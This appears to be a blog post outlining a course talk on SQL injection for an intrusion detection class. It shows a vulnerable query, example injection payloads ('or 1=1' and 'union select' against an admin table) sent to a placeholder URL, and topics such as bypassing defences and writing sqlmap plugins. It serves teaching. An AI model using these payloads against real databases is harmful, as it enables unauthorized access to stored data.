cdxy.me
Footprints on Cyber Security and Python

北京交通大学-信息安全-入侵检测课程分享主题 16.03.06

SQLI介绍

原理

SELECT * FROM user WHERE id='$id' LIMIT 0,1";

正常情况

[GET] http://www.aaa.com?id=1

SELECT * FROM user WHERE id='1' LIMIT 0,1";

获取当前表所有列

[GET] http://www.aaa.com?id=1' or 1=1 --+

SELECT * FROM user WHERE id='1' or 1=1 --+ ' LIMIT 0,1";

获取其他库/其他表中的数据

[GET] http://www.aaa.com?id=1' or 1=1 union select 1,2,3 from admin --+

SELECT * FROM user WHERE id='1' or 1=1 union select 1,2,3 from admin --+ ' LIMIT 0,1";

 

知识准备

HTML 表单前后端处理逻辑

数据库

MySQL SQLServer Oracle

抓包

BurpSuite

编码

实战演示

北京交通大学数据查询系统

fuzzing 防御机制绕过 sqlmap插件编写